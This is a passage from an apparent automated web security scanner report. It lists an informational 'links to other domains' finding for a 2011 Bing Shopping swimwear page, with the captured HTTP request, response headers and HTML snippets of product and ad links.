BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Dazzle-Lipstick-SUPERIOR--P1684997.aspx" onmousedown="return si_T('&ID=commerce,58.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=bt8oRK%2bZJsrvTw&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Dazzle Lipstick SUPERIOR" alt="MAC Cosmetics Dazzle Lipstick SUPERIOR" width="100" height="96" style="margin-top:34px;" /></a>
...[SNIP]...
clkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Satin-Lipstick-SNOB--P222408.aspx" onmousedown="return si_T('&ID=commerce,61.1',this)"><img src="http://a4.bing4.com/thumb/get?bid=DADVssGCuWYaUA&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Satin Lipstick SNOB" alt="MAC Cosmetics Satin Lipstick SNOB" width="83" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Lustre-Lipstick-SOPHISTO--P1495858.aspx" onmousedown="return si_T('&ID=commerce,64.1',this)"><img src="http://a1.bing4.com/thumb/get?bid=LOH2QA%2ftpRffPQ&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Lustre Lipstick SOPHISTO" alt="MAC Cosmetics Lustre Lipstick SOPHISTO" width="100" height="99" style="margin-top:33px;" /></a>
...[SNIP]...
lkid=BBBDEB63BDBD4A6E8DA2353BBCA9DA9C&c=796804&mu=http%3a%2f%2fbeautygirl4makeup.com%2fMAC-Cosmetics-Lipstick-BRICK-O-LA--P1418936.aspx" onmousedown="return si_T('&ID=commerce,67.1',this)"><img src="http://a2.bing4.com/thumb/get?bid=jPjlgXSN3zaw9Q&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="MAC Cosmetics Lipstick BRICK-O-LA" alt="MAC Cosmetics Lipstick BRICK-O-LA" width="99" height="100" style="margin-top:32px;" /></a>
...[SNIP]...
<a href="/shopping/mac-studio-fix-powder-plus-foundation-nc20/p/833F73CCC22FC18F5006?q=MAC+cosmetics&FORM=EGCA15" onmousedown="return si_T('&ID=commerce,70.1',this)"><img src="http://a3.bing4.com/getimage?q=big-CA34CB0E3298E212E7FF97C2635E7526&wf=Comimage" title="MAC Studio Fix Powder Plus Foundation NC20" alt="MAC Studio Fix Powder Plus Foundation NC20" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vEq1DOxCNTgodBnCCN9PUAySR64vGuITELxvcs_yTo45y4ylgr2rq1lxkPSf7WGXnRpOv5AN_Qajv-PHCd_5ICJvWd3Z1WJ5wfY4pjAWOHpvNScraml8jk1Av4p1sfKcvy2G1x7s1iyy4duaWgjwx_mXCCQNZJrsOn3RmwU6BxJmL_z-et1uGujTVCO1noaUHRmokQhH1GNlobeuEUlkjLDiFESeM9txQpGK6juoH6l9iLcVYmbIFRujBvEm6rOz3TZJLIAeWRA49u4yEkwm0W95bfI-Q_HRkYGM9PvkfiFXtdFvralNsqPf6GcjthT8ZNVQJTCMDjqkIonP-9kNcCIQ5bEUQJmNzPYsqJ2mxhhsTlqHQwvkRXK1M5Vy4-BobV9sCDPmuJiae" onmousedown="return si_T('&ID=FD,58.1,Ads')">Dillard's - Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vGAL1SBCEdXzhb7_ep95MdPncmpfA2k6Eij6vSi3LcXkmFDUBYmOhOz3oOKaqlul4TWYGiqJVOsqlF91hOIQuzTfW9aOu9uWHFodunSQJm2D9mzCoOeR3kP7QEJX_9A7g5ApAnmOTfeYcuyGjZP_rojRwPyAywpOVJhejnobbYbemg0-QniME48PYSdi5A5Bdy9t_l9StTFLAy4xDznfnih9xGvNpMcNQiqwH3TwSHsBu7qQKzXuG8KqiTYpkAYjJgUmKr2qu29vS9IWGnrFDyWItqwrgA0vlz8YQxQYR-hg1VAlMIC1RchNWR6aL_dsgj9gSpRAmY3M9CaLvCTssDq1FWZRAkpGUXlGYhfw---32OKTaNoNhpcQ" onmousedown="return si_T('&ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,157.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,159.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,161.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,163.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,165.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,167.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=MAC%20cosmetics&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2bcosmetics%26vw%3dgr%26FORM%3dSHOPH1%26crea%3d012911cosmetics&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fmakeup%2fc%2f4259%3fq%3dMAC%2520cosmetics%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,169.1')">Tell us what you think</a>
...[SNIP]...

22.392. http://www.bing.com/shopping/swimwear/c/4503 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/swimwear/c/4503

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/shopping/swimwear/c/4503?q=plus-size+swimwear&FORM=SHOPH1&crea=012911swimwear

The response contains the following links to other domains:

http://0.r.redacted/?ld=4v53yHYora9j9GPi_3uhmV8QVBwlgdIV5iaUs78_1NhMCwR1ejPoMn77KvCYW8NnC0efTKPDx7PQiO6ZLTjIR9kLSpsBzhV5mE1Nqf-1qgAMSS6GSWmdOGH_YbA_HhNj7H23Q2IJKo_8E19a0viPUafR8-nGjnW4b67cOWljDoZe4SOp4i79822pA_CkZUswEq8ohaxbI61N0329fv-_YqKTvIa20TVb3EJoz1ZpKiPeMP8DOGNu4_CjTtv5OOTwhZcRTmMfd7XXe5wYngcDEP4eDSm-s5Q1jzufS8rIj_5QH-n_fZIlTPFdseIvdd1Jd0y2-NgihpEzioDOcZSZHnUqqJ8JBDhXu0LmX6msrm0nShfiJLzzONmEdDz3SOXTj22-8wttWjNad_9Bfdb_IbS9DZvPlO0wkyL9aUNAC-6p41VAlM6MyvSvFLIvZLuYrrHWLKDhAmY3M9Xl6OmUn7J0R3o2sCoMUPZVS_s7siGxAU4J_Tm7BbLPo
http://0.r.redacted/?ld=4v6vCgk3oCadYGZ8YMoFsGfUJbcaeYKK3JfqnWqBzm4KLzpbs2nS6_R_GDQzkRRzpuuKvzqZSceoWEu44I0oSxVBvunwRqcVyh5_o2CBOyFfH5hED0k78jJF5KY00AiuiIM_6V5f9-HcIqSck4o5iadV81xlc22MTumrhxGzTtLqggh9Lv0uuNmCvGOyLSJtKEdJjOzlUpJ0puN6LopqPyHyOZ3CZQGHa9liyMDIr69xrQxTz9mbB3Ohx5GOnTEArNCoLhia1ozgqJLYuwAFiE1zVUCUzxPTnNhqfija63S9XifJXTECZjcz2cDOKdos2tymhO5OQ3ifMBKhsCNO1iu8ap50Uw6qH0QA
http://0.r.redacted/?ld=4vLNHuap9D4Yv5RRrX3KJUosXUKHrN3h7f_1Pz3oGM729SxfQheaR3mYCivzqfjAs45m-hCR_1m_75t_v8eBodyivV2yW73YltdRSSrBbYsUA9AwiDXO9VhFh43fGImo32_d40mgGwtrq_50g9r7oy72tLF8vnb3bniP1duoUYFllI9R_c2br6M7SZ0nzDELIR2CZi8F2y6RFQoqxnrsR70INwlnUxWwpQCihI4QsiBPfv-eIdlFq9Vfzk1nU1pM5pqlZ5pOomiL5vfVoyACnKbTFBYU4y1CUCN1Sb8ilgvnsXH5F02NHoiUnlrknGOKBbQPVFLJy3TZ7AxPO9WNxW5DVUCUx2Zm3k2cp94p6S9yaQ40b_ECZjcz2OsNdR8CJL1_f60Ftgo8M6e3ntBHjU2jCoBSkkGc5z4w
http://0.r.redacted/?ld=4vOJQ2dFie1YmD4SYvLn2_M1O_l9EQEOrzExK8-mlXbT075AMwPEj2ORymlISHwrx-GSRCKOQU4xMOlNw9JuR9cJXGcZqaAAP5l-7jBijYfsuEzLFjpyfEHLfwWi7r_jRuZhaL7TmFMrRvQTDnAIHWPeZxO_VN6wPQ6sLbTVINsNKRJARvq8o5_GQhQS6bI5l2apTwTrzU5Pxyz-g2zXT904oY3GftZQUAECKGF84pohT2S-1xfk0zZll6tPoE73f_hvEjTgtn5e46zDzC5UPbaV6czDPEiXTUIuJd2wsac8VgeuxzJWQHvbRQo-LJmj2XBCXE5Ak4lAVW-Dr1YGN0gxW0FIUcMMrmSpc6pfRbO4W6b__FL5EtfrYA730vVjJbLsD4e-A2MUH3ryG6YhTHHTVUCUxFyoSb2g0wepjhTCZduA3pECZjcz2LrvGZtGHExUlH3D-gFiWNfcaudMe7IlKbKqT7h3uVyQ
http://0.r.redacted/?ld=4vu85eu905PJ8IGj8f18cMPcRHoyjJ4PcZUArX5etc6c8OizOmc0y5zDz9Mo1rAD8tKD2udvvoGcIgwXcGmftPNoYqFn9sWvE0BQFLG3EQ76hWVWckocCqYv2uqNHclVmztEiPRNQ4sdc3kvjbf5aOqa4rgB_ba1-8r-2NErElWVoCfLI74iv8rSxr-It2tcq0qD5yw6mM2IwYAMPE_mYlaLSZ64ey4k1qHlKwonu0VdHAKjbH3X6mAEpyIjcVDkj5WTIacwVRSGB5VKfMg4ZQt28-bxyWOONDT09E9NhSoR3jcrBFp_n_V_pOLeJJgHv9pSg_aQSSAamz7SJUPZBQ8UjRRb9Hkx-ORcO3wjhjUwgruDkgxE4TEN3TQ6sbIWLEHloSlB_COahn9X7HyDfP8BkIplfGzDVV-p4kgwannmzGLWRJaYKe0pswnlwB8iF8NVQJTDCYmOwJ6m9TaDyIiiQ8wj4QJmNzPdHEUGtSkhUn5rE5kOfuWL1fvNm7bcphknpkI012vWJB
http://0.r.redacted/?ld=4vx6-Gyx8_37lrqotWhsnakfUmnda0sYFaEoOtH75yFfxs_FzHf80HSWSsx6nAR7Mtr6uXXEmXW5qN0QXNLqLihNxG0jgCWKCi8-j8C1outxDHa_OVWjFjMEkJvIPVz18vZ9osxY4I8Kc7yqA9S3Iiswpp-mqK4Ag-ifWFR9T0fd3BaIIBKz8Y8VBxC-J7Zt8KRcZaIoDYk7zqqwws4D-9Efegh664_f-WFEhENJquZQcI54X55x_jIroWY9uOto1Q2FBpWqFT3UwwlGBdkTXAtPzt-_qEpMAn5PcA2rBuCJXyCr1VPtPrFvt6DLRT33kcjvNoKYVDoUaVOtEQD7_kQGCREEpx5-qv5jL5_Agn2lmcX9NSEdjATgnz3d39VH2Ces8NLWGIpNO64t4kgs0IxTVUCUyJkk1DniG_6utZtYbOu8ZjECZjcz2HE_FnGmqSNZI1_1f5ZfotTMwiLIcBdP8Tkko-alW9ag
http://6766.r.redacted/?ld=4v1V6riJb29HvWXV4XOgZVTH2REZ3jVeqkWB1JkqpGivjz4O0BZhMK74AmJES9_Gwkvo0bUdsxa3CyaRlxmifg0kaDqfks0F5R3AfPwoDM19xVAfJwMqiPgsyoJydWLg4RjkN3pSXRVwFAu5Kmopc2ZcCD_vpjDwHbjC_I6snCrWp0COogel0wycHFQ4EMgywvNhETFE-YMZHUKqeY1l1KHKoJkZrkRVJnO0ktPA8av-_aTEdrD3rZBF_1nLJyTMR9tjNi92Y6wJkColk1bx0go93Sna9Ij0ymoLjIWbVUKkU1VAlMOgKthCX7UakSrubcshsBLBAmY3M9qN-wBk-aw80zCLIUw8KPdmuw-0s_z08x8wMO-7z24yQ
http://822761.r.redacted/?ld=4vAbsQiNPDVwdmk5aizBmpT2hjeZnYkfnymGjYkISYz5qGIWT7osk058ydRjVfJ1NEJ8u2aa5My1ChOtz63x7xiSAmnSBaIqINzJlFI_n-wj6j2KKF6m85FO-JXfLSI74sIVLMbbjyvP0BPG3WQkarzspCpNfkA0YyvaX24iralxQ_DGlxIIgYJdKjCflF-BddicrAEhLnjyZ3uBG-NTOkdzVUCUzctsPy20DUwFXfY2iRUlWWECZjcz3YdPr5QRRwPhpbgEA_Ard3hBx52CKS6ATYEC0rh0j6Yg
http://893563.r.redacted/?ld=4vOaWSnhW_2FnMxyxGtXj8lsMGpqD-gKGjaw0PTnOaNYo1VkkpO9oBWiftFOYzwF5Zyu7Mffp1tEsXnV4rRNyvZYr31Spp7RePYqFNyPe2Q-6G4HMLtnPa7_H8SYDSJrCK39bQ8BfIwaJsR8DOQbwiOmoqI6BUX5eYKD4sB77fhoMKM9vcdkiX0deUl7hetbhEGRgwp8_iMxv6R7og27-eNaz3s_-cd61_arIin7k1nqq0lukstjU6-wc-S28I7gNiVHkENAJvjFF90gOoA_0E3jVUCUy1ntsGh6vI1O84-BAWmgifECZjcz3411hJjFi2EIZQCrbNjlBTHesNk6_HQOa8LZnjQ5-FnQ
http://a1.bing4.com/getimage?q=big-06B92552D061BB5D621EC181A9A06634&wf=Comimage
http://a1.bing4.com/getimage?q=big-2A0EDE17A519915359CDC2AAE21A694E&wf=Comimage
http://a1.bing4.com/getimage?q=big-33C07C4048E2F323465972AE39F6F902&wf=Comimage
http://a1.bing4.com/getimage?q=big-C45C11A2B91B55B1A82BBE7432A13894&wf=Comimage
http://a2.bing4.com/getimage?q=big-72A8FD1A31669793B964EC76F05D5E67&wf=Comimage
http://a2.bing4.com/getimage?q=big-91A826474D5FD84CF0D3C5E957831926&wf=Comimage
http://a2.bing4.com/getimage?q=big-D8A33F77FF3E896265CD9C5A085136CC&wf=Comimage
http://a2.bing4.com/getimage?q=big-FC0B0841983CF3CC15A5DF90F4A5621E&wf=Comimage
http://a3.bing4.com/getimage?q=big-6758BD0CE894E8A0275D9EAA59746B16&wf=Comimage
http://a3.bing4.com/getimage?q=big-9CB99148EEEF086148EF91B32A1F6280&wf=Comimage
http://a3.bing4.com/getimage?q=big-B10ED715112896841CC07E8DA6AF6B68&wf=Comimage
http://a3.bing4.com/thumb/get?bid=l47sO3W5tJeqgg&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC
http://a4.bing4.com/getimage?q=big-2DFDFDBEB043D0492840EF6DF43E1EA7&wf=Comimage
http://a4.bing4.com/getimage?q=big-8FCB8BFA76B9D75977724265755D4C2C&wf=Comimage
http://a4.bing4.com/getimage?q=big-C35C4DE27B8D720012EB933E790E169E&wf=Comimage
http://a4.bing4.com/getimage?q=big-FB60916598347F38D1CCEABDECD07FEB&wf=Comimage
http://advertising.microsoft.com/advertise-on-bing
http://advertising.microsoft.com/search/
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&market=en-US
http://www.redacted/
https://feedback.discoverbing.com/default.aspx?locale=en-US&productkey=bingshopping&P1=dsatcommerce&P2=plus-size%20swimwear&P3=0&P4=SHOPH1&P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&P6=&P7=Original&P8=&P9=0.0/0.0&P10=0.0&P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2bswimwear%26FORM%3dSHOPH1%26crea%3d012911swimwear&P12=&searchtype=Commerce+Answer&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2520swimwear%26FORM%3dFEEDTU

Request

GET /shopping/swimwear/c/4503?q=plus-size+swimwear&FORM=SHOPH1&crea=012911swimwear HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:33 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=A0A0DF4581144706A193D88904DFBDB3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8373d67c66ef4e8a8f8b648f98d98aeb; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:34 GMT; domain=.bing.com; path=/
Content-Length: 87142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,40.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,42.1')">Hotmail</a>
...[SNIP]...
ef="/shopping/plus-size-swimwear-longitude-fanclub-plus-size-tank-one-piece-swimsuit/p/A2E06820B761A4C55002?q=plus-size+swimwear&FORM=EGCA0" onmousedown="return si_T('&ID=commerce,63.1',this)"><img src="http://a4.bing4.com/getimage?q=big-C35C4DE27B8D720012EB933E790E169E&wf=Comimage" title="Plus Size Swimwear Longitude Fanclub Plus Size Tank One Piece Swimsuit" alt="Plus Size Swimwear Longitude Fanclub Plus Size Tank One Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/speedo-womens-vanquisher-ultraback-endurance-plus-size-swimsuit/p/3EC54BD2D71C16C97516?q=plus-size+swimwear&FORM=EGCA1" onmousedown="return si_T('&ID=commerce,66.1',this)"><img src="http://a1.bing4.com/getimage?q=big-2A0EDE17A519915359CDC2AAE21A694E&wf=Comimage" title="Speedo Womens Vanquisher Ultraback Endurance Plus Size Swimsuit" alt="Speedo Womens Vanquisher Ultraback Endurance Plus Size Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-swimsuit-speedo-chlorine-proof-shirred-plus-size/p/4A7CC3598A98A952B762?q=plus-size+swimwear&FORM=EGCA2" onmousedown="return si_T('&ID=commerce,69.1',this)"><img src="http://a2.bing4.com/getimage?q=big-D8A33F77FF3E896265CD9C5A085136CC&wf=Comimage" title="Plus Size Swimsuit Speedo .. Chlorine Proof Shirred Plus Size ..." alt="Plus Size Swimsuit Speedo .. Chlorine Proof Shirred Plus Size ..." width="102" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-solitaire-escape-womens-swimwear/p/32AFAC20BC03566F5002?q=plus-size+swimwear&FORM=EGCA3" onmousedown="return si_T('&ID=commerce,72.1',this)"><img src="http://a3.bing4.com/getimage?q=big-B10ED715112896841CC07E8DA6AF6B68&wf=Comimage" title="Plus Size Solitaire Escape Womens Swimwear" alt="Plus Size Solitaire Escape Womens Swimwear" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-swimskirt-swimwear-by-swim-365/p/73D72458CFCCD74D5006?q=plus-size+swimwear&FORM=EGCA4" onmousedown="return si_T('&ID=commerce,75.1',this)"><img src="http://a4.bing4.com/getimage?q=big-8FCB8BFA76B9D75977724265755D4C2C&wf=Comimage" title="Woman Within Plus Size Swimskirt swimwear by Swim 365" alt="Woman Within Plus Size Swimskirt swimwear by Swim 365" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/longitude-ombre-stripe-plus-size-one-piece-swimsuit/p/DF2EBC4C6785FE7D5006?q=plus-size+swimwear&FORM=EGCA5" onmousedown="return si_T('&ID=commerce,78.1',this)"><img src="http://a1.bing4.com/getimage?q=big-06B92552D061BB5D621EC181A9A06634&wf=Comimage" title="Longitude Ombre Stripe Plus Size One Piece Swimsuit" alt="Longitude Ombre Stripe Plus Size One Piece Swimsuit" width="101" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-mix-match-swimsuit-briefs-swimwear/p/20F2BF3C1B0118425006?q=plus-size+swimwear&FORM=EGCA6" onmousedown="return si_T('&ID=commerce,81.1',this)"><img src="http://a2.bing4.com/getimage?q=big-72A8FD1A31669793B964EC76F05D5E67&wf=Comimage" title="Woman Within Plus Size mix & match swimsuit briefs swimwear ..." alt="Woman Within Plus Size mix & match swimsuit briefs swimwear ..." width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-2-piece-swimsuit-by-sunbird/p/CA5033BD286C5E3A5006?q=plus-size+swimwear&FORM=EGCA7" onmousedown="return si_T('&ID=commerce,84.1',this)"><img src="http://a3.bing4.com/getimage?q=big-6758BD0CE894E8A0275D9EAA59746B16&wf=Comimage" title="Woman Within Plus Size 2-piece swimsuit by Sunbird" alt="Woman Within Plus Size 2-piece swimsuit by Sunbird" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-1-piece-swimsuit-by-swim365/p/EDFAA4CAAA6FBEF45006?q=plus-size+swimwear&FORM=EGCA8" onmousedown="return si_T('&ID=commerce,87.1',this)"><img src="http://a4.bing4.com/getimage?q=big-FB60916598347F38D1CCEABDECD07FEB&wf=Comimage" title="Woman Within Plus Size 1-piece swimsuit by Swim365" alt="Woman Within Plus Size 1-piece swimsuit by Swim365" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/woman-within-plus-size-solid-swimsuit-by-contour-by-beach-scene/p/A8BCEBACECE4E0835006?q=plus-size+swimwear&FORM=EGCA9" onmousedown="return si_T('&ID=commerce,90.1',this)"><img src="http://a1.bing4.com/getimage?q=big-33C07C4048E2F323465972AE39F6F902&wf=Comimage" title="Woman Within Plus Size solid swimsuit by Contour by Beach Scene" alt="Woman Within Plus Size solid swimsuit by Contour by Beach Scene" width="111" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/longitude-ambrosia-plus-size-surplice-one-piece-swimsuit/p/8B3D1D0CDD473EFA5006?q=plus-size+swimwear&FORM=EGCA10" onmousedown="return si_T('&ID=commerce,93.1',this)"><img src="http://a2.bing4.com/getimage?q=big-91A826474D5FD84CF0D3C5E957831926&wf=Comimage" title="Longitude Ambrosia Plus Size Surplice One Piece Swimsuit" alt="Longitude Ambrosia Plus Size Surplice One Piece Swimsuit" width="101" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-sonatina-1-piece-swimsuit/p/7D38651683E384E65002?q=plus-size+swimwear&FORM=EGCA11" onmousedown="return si_T('&ID=commerce,96.1',this)"><img src="http://a3.bing4.com/getimage?q=big-9CB99148EEEF086148EF91B32A1F6280&wf=Comimage" title="Plus Size Sonatina 1 Piece Swimsuit" alt="Plus Size Sonatina 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-sanibel-1-piece-swimsuit/p/DCC0BBD40DC4DF275002?q=plus-size+swimwear&FORM=EGCA12" onmousedown="return si_T('&ID=commerce,99.1',this)"><img src="http://a4.bing4.com/getimage?q=big-2DFDFDBEB043D0492840EF6DF43E1EA7&wf=Comimage" title="Plus Size Sanibel 1 Piece Swimsuit" alt="Plus Size Sanibel 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-oceanus-1-piece-swimsuit/p/304DCAB3ADE8D7F35002?q=plus-size+swimwear&FORM=EGCA13" onmousedown="return si_T('&ID=commerce,102.1',this)"><img src="http://a1.bing4.com/getimage?q=big-C45C11A2B91B55B1A82BBE7432A13894&wf=Comimage" title="Plus Size Oceanus 1 Piece Swimsuit" alt="Plus Size Oceanus 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-pandora-1-piece-swimsuit/p/5B8371B726F8533C5002?q=plus-size+swimwear&FORM=EGCA14" onmousedown="return si_T('&ID=commerce,105.1',this)"><img src="http://a2.bing4.com/getimage?q=big-FC0B0841983CF3CC15A5DF90F4A5621E&wf=Comimage" title="Plus Size Pandora 1 Piece Swimsuit" alt="Plus Size Pandora 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
9tvoGayyT3&cbst=1.3&msclkid=87F15C961AE14766AA22D58F41A70DA3&c=683860&mu=http%3a%2f%2fbodybody.com%2fujena-swim-wear-p246.html" onmousedown="return si_T('&ID=commerce,108.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=l47sO3W5tJeqgg&bn=CC&fbid=95xJb3S%2fWTcG0A&fbn=CC" title="Grape Smoothie Bottom Only" alt="Grape Smoothie Bottom Only" width="96" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vu85eu905PJ8IGj8f18cMPcRHoyjJ4PcZUArX5etc6c8OizOmc0y5zDz9Mo1rAD8tKD2udvvoGcIgwXcGmftPNoYqFn9sWvE0BQFLG3EQ76hWVWckocCqYv2uqNHclVmztEiPRNQ4sdc3kvjbf5aOqa4rgB_ba1-8r-2NErElWVoCfLI74iv8rSxr-It2tcq0qD5yw6mM2IwYAMPE_mYlaLSZ64ey4k1qHlKwonu0VdHAKjbH3X6mAEpyIjcVDkj5WTIacwVRSGB5VKfMg4ZQt28-bxyWOONDT09E9NhSoR3jcrBFp_n_V_pOLeJJgHv9pSg_aQSSAamz7SJUPZBQ8UjRRb9Hkx-ORcO3wjhjUwgruDkgxE4TEN3TQ6sbIWLEHloSlB_COahn9X7HyDfP8BkIplfGzDVV-p4kgwannmzGLWRJaYKe0pswnlwB8iF8NVQJTDCYmOwJ6m9TaDyIiiQ8wj4QJmNzPdHEUGtSkhUn5rE5kOfuWL1fvNm7bcphknpkI012vWJB" onmousedown="return si_T('&ID=FD,58.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v53yHYora9j9GPi_3uhmV8QVBwlgdIV5iaUs78_1NhMCwR1ejPoMn77KvCYW8NnC0efTKPDx7PQiO6ZLTjIR9kLSpsBzhV5mE1Nqf-1qgAMSS6GSWmdOGH_YbA_HhNj7H23Q2IJKo_8E19a0viPUafR8-nGjnW4b67cOWljDoZe4SOp4i79822pA_CkZUswEq8ohaxbI61N0329fv-_YqKTvIa20TVb3EJoz1ZpKiPeMP8DOGNu4_CjTtv5OOTwhZcRTmMfd7XXe5wYngcDEP4eDSm-s5Q1jzufS8rIj_5QH-n_fZIlTPFdseIvdd1Jd0y2-NgihpEzioDOcZSZHnUqqJ8JBDhXu0LmX6msrm0nShfiJLzzONmEdDz3SOXTj22-8wttWjNad_9Bfdb_IbS9DZvPlO0wkyL9aUNAC-6p41VAlM6MyvSvFLIvZLuYrrHWLKDhAmY3M9Xl6OmUn7J0R3o2sCoMUPZVS_s7siGxAU4J_Tm7BbLPo" onmousedown="return si_T('&ID=FD,60.1,Ads')"><strong>
...[SNIP]...
